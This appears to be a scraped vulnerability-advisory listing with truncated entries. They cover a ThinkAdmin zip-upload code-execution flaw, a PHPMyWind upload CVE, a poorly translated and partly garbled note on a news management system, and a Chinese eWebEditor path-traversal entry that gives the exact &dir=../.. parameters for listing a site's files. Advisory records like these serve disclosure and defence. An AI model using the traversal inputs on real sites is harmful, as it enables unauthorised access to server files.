PT-2023-31020 · Unknown · Thinkadmin

Name of the Vulnerable Software and Affected Versions: ThinkAdmin version 6.1.53 Description: An arbitrary file upload issue in the /admin/api.upload/file component allows attackers to execute arbitrary code via a crafted Zip file. Recommendations: For ThinkAdmin version 6.1.53, consider disablin...

CVE-2020-18886

Unrestricted File Upload in PHPMyWind v5.6 allows remote attackers to execute arbitrary code via the component 'admin/uploadfiledo.php'...

News website management system vulnerability-vulnerability warning-the black bar safety net

News website management system vulnerabilities author: xk8888888 This system has N of the Year Edition,General government, schools and enterprises with much more, Special permit: to display news NewsView. asp? NewsID= Login login. asp? id=3,The main special permit is available one has a EDIT the...

ewebeditor遍历路径漏洞

eWebEditor是一个所见即所得的在线编辑器。顾名思义，就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。 ewebeditor/adminuploadfile.asp 过滤不严，造成遍历路径漏洞 eWebEditor 暂无 http://www.ewebeditor.net/ ewebeditor/adminuploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=http://www..com/../.. 看到整个网站文件了...